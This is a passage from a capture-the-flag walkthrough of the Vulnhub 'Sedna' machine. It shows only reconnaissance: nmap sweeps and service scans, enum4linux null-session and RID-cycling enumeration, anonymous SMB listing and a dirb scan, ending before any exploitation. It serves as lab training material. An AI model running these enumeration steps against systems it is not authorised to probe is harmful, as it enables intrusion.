hackfest2016: Sedna Walkthrough

Sedna is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
Welcome to Sedna
This is a vulnerable machine i created for the Hackfest 2016 CTF http://hackfest.ca/
Difficulty : Medium
Tips:
There are multiple way to root this box, if it should work but doesn’t try to gather more info about why its not working.
Goals: This machine is intended to be doable by someone who have some experience in doing machine on vulnhub
There are 4 flags on this machine 
One for a shell 
One for root access 
Two for doing post exploitation on Sedna
Feedback: This is my second vulnerable machine, please give me feedback on how to improve ! @ViperBlackSkull on Twitter simon.nolet@hotmail.com
Special Thanks to madmantm for testing this virtual machine
SHA-256 : 178306779A86965E0361AA20BA458C71F2C7AEB490F5FD8FAAFAEDAE18E0B0BA

Identify the IP address of Sedna machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.1/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-17 15:27 EDT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 7.45% done; ETC: 15:27 (0:00:00 remaining)
Nmap scan report for 192.168.1.1
Host is up (0.0016s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.2
Host is up (0.091s latency).
MAC Address: 70:70:0D:C9:AD:78 (Unknown)
Nmap scan report for 192.168.1.4
Host is up (0.060s latency).
MAC Address: B4:4B:D2:8C:6F:38 (Unknown)
Nmap scan report for 192.168.1.5
Host is up (0.062s latency).
MAC Address: 08:6D:41:BA:BD:EC (Unknown)
Nmap scan report for 192.168.1.8
Host is up (0.093s latency).
MAC Address: 68:07:15:7A:EC:52 (Unknown)
Nmap scan report for 192.168.1.9
Host is up (0.093s latency).
MAC Address: 54:EA:A8:7A:43:03 (Apple)
Nmap scan report for 192.168.1.10
Host is up (0.074s latency).
MAC Address: BC:9F:EF:69:35:19 (Unknown)
Nmap scan report for 192.168.1.11
Host is up (0.00040s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.085s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.28
Host is up (0.00055s latency).
MAC Address: 08:00:27:CD:8F:83 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.34
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 6.86 seconds
root@kali:~#

Identify services running on Sedna

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.28
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-17 15:28 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating ARP Ping Scan at 15:28
Scanning 192.168.1.28 [1 port]
Completed ARP Ping Scan at 15:28, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:28
Completed Parallel DNS resolution of 1 host. at 15:28, 0.01s elapsed
Initiating Connect Scan at 15:28
Scanning 192.168.1.28 [65535 ports]
Discovered open port 53/tcp on 192.168.1.28
Discovered open port 993/tcp on 192.168.1.28
Discovered open port 110/tcp on 192.168.1.28
Discovered open port 139/tcp on 192.168.1.28
Discovered open port 80/tcp on 192.168.1.28
Discovered open port 143/tcp on 192.168.1.28
Discovered open port 8080/tcp on 192.168.1.28
Discovered open port 111/tcp on 192.168.1.28
Discovered open port 445/tcp on 192.168.1.28
Discovered open port 22/tcp on 192.168.1.28
Discovered open port 995/tcp on 192.168.1.28
Discovered open port 50177/tcp on 192.168.1.28
Completed Connect Scan at 15:28, 2.78s elapsed (65535 total ports)
Initiating Service scan at 15:28
Scanning 12 services on 192.168.1.28
Completed Service scan at 15:28, 12.10s elapsed (12 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.28
NSE: Script scanning 192.168.1.28.
Initiating NSE at 15:28
Completed NSE at 15:28, 8.22s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.01s elapsed
Nmap scan report for 192.168.1.28
Host is up (0.00043s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
| 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
|_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
| dns-nsid:
|_ bind.version: 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL STLS UIDL CAPA AUTH-RESP-CODE RESP-CODES TOP PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 46452/udp status
|_ 100024 1 50177/tcp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more listed IDLE capabilities have LOGINDISABLEDA0001 Pre-login LITERAL+ IMAP4rev1 OK STARTTLS ENABLE ID LOGIN-REFERRALS post-login SASL-IR
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more listed IDLE capabilities have SASL-IR LITERAL+ IMAP4rev1 Pre-login OK ENABLE ID LOGIN-REFERRALS post-login AUTH=PLAINA0001
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) USER UIDL CAPA AUTH-RESP-CODE RESP-CODES TOP PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048.0
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2016-10-07T19:17:14
| Not valid after: 2026-10-07T19:17:14
| MD5: a32c 1b8e 97f3 210f d238 ba3d ac45 74f7
|_SHA-1: 0b7b 4229 b7af 8f89 d533 2ecf 5a1f f652 a015 0295
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
50177/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:CD:8F:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 198.840 days (since Sun Oct 30 19:19:22 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 4s
| nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SEDNA<00> Flags: <unique><active>
| SEDNA<03> Flags: <unique><active>
| SEDNA<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| Computer name: sedna
| NetBIOS computer name: SEDNA
| Domain name:
| FQDN: sedna
|_ System time: 2017-05-17T15:28:35-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.1.28
NSE: Script Post-scanning.
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Initiating NSE at 15:28
Completed NSE at 15:28, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ 4s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.55 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)
root@kali:~#

Port 22 — Inspecting SSH — OpenSSH 6.6.1p1

No suitable exploits were found hence moving on.

Port 139,445 — Inspecting SMB — netbios-ssn Samba smbd

Lets run enum4linux

root@kali:~# enum4linux 192.168.1.28
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 17 15:30:03 2017
==========================
| Target Information |
==========================
Target ........... 192.168.1.28
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 192.168.1.28 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 192.168.1.28 |
============================================
Looking up status of 192.168.1.28
SEDNA <00> - B <ACTIVE> Workstation Service
SEDNA <03> - B <ACTIVE> Messenger Service
SEDNA <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 192.168.1.28 |
=====================================
[+] Server 192.168.1.28 allows sessions using username '', password ''
===========================================
| Getting domain SID for 192.168.1.28 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 192.168.1.28 |
======================================
[+] Got OS info for 192.168.1.28 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
[+] Got OS info for 192.168.1.28 from srvinfo:
SEDNA Wk Sv PrQ Unx NT SNT Sedna server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
=============================
| Users on 192.168.1.28 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: viper Name: viper Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: root Name: root Desc:
user:[viper] rid:[0x3e8]
user:[root] rid:[0x3e9]
=========================================
| Share Enumeration on 192.168.1.28 |
=========================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Sharename       Type      Comment
--------- ---- -------
IPC$ IPC IPC Service (Sedna server (Samba, Ubuntu))
print$ Disk Printer Drivers
Server               Comment
--------- -------
SEDNA Sedna server (Samba, Ubuntu)
Workgroup            Master
--------- -------
WORKGROUP SEDNA
[+] Attempting to map shares on 192.168.1.28
//192.168.1.28/IPC$ Mapping: OK Listing: DENIED
//192.168.1.28/print$ Mapping: DENIED, Listing: N/A
====================================================
| Password Policy Information for 192.168.1.28 |
====================================================
[+] Attaching to 192.168.1.28 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] SEDNA
[+] Builtin
[+] Password Info for Domain: SEDNA
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
==============================
| Groups on 192.168.1.28 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 192.168.1.28 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-5-21-2217169221-2747901371-1699642345
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2217169221-2747901371-1699642345 and logon username '', password ''
S-1-5-21-2217169221-2747901371-1699642345-500 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-501 SEDNA\nobody (Local User)
S-1-5-21-2217169221-2747901371-1699642345-502 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-503 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-504 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-505 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-506 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-507 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-508 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-509 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-510 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-511 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-512 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-513 SEDNA\None (Domain Group)
S-1-5-21-2217169221-2747901371-1699642345-514 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-515 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-516 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-517 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-518 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-519 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-520 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-521 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-522 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-523 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-524 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-525 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-526 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-527 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-528 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-529 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-530 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-531 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-532 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-533 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-534 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-535 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-536 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-537 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-538 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-539 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-540 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-541 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-542 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-543 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-544 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-545 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-546 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-547 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-548 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-549 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-550 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1000 SEDNA\viper (Local User)
S-1-5-21-2217169221-2747901371-1699642345-1001 SEDNA\root (Local User)
S-1-5-21-2217169221-2747901371-1699642345-1002 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1003 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1004 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1005 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1006 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1007 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1008 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1009 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1010 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1011 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1012 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1013 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1014 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1015 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1016 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1017 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1018 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1019 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1020 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1021 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1022 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1023 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1024 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1025 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1026 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1027 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1028 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1029 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1030 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1031 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1032 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1033 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1034 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1035 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1036 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1037 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1038 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1039 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1040 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1041 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1042 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1043 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1044 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1045 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1046 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1047 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1048 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1049 *unknown*\*unknown* (8)
S-1-5-21-2217169221-2747901371-1699642345-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\crackmeforpoints (Local User)
=============================================
| Getting printer info for 192.168.1.28 |
=============================================
No printers returned.
enum4linux complete on Wed May 17 15:30:24 2017
root@kali:~#

From this we figure out the

  1. Samba Version : Samba 4.1.6-Ubuntu
  2. Null Session is enabled
  3. Local user : crackmeforpoints
root@kali:~# smbclient --list=192.168.1.28
WARNING: The "syslog" option is deprecated
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Sharename       Type      Comment
--------- ---- -------
IPC$ IPC IPC Service (Sedna server (Samba, Ubuntu))
print$ Disk Printer Drivers
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.1.6-Ubuntu]
Server               Comment
--------- -------
SEDNA Sedna server (Samba, Ubuntu)
Workgroup            Master
--------- -------
WORKGROUP SEDNA
root@kali:~#

Port 80–Inspecting Apache httpd 2.4.7 ((Ubuntu))

root@kali:~# dirb http://192.168.1.28
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 17 15:34:42 2017
URL_BASE: http://192.168.1.28/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.28/ ----
==> DIRECTORY: http://192.168.1.28/blocks/
==> DIRECTORY: http://192.168.1.28/files/
+ http://192.168.1.28/index.html (CODE:200|SIZE:101)
==> DIRECTORY: http://192.168.1.28/modules/
+ http://192.168.1.28/robots.txt (CODE:200|SIZE:36)
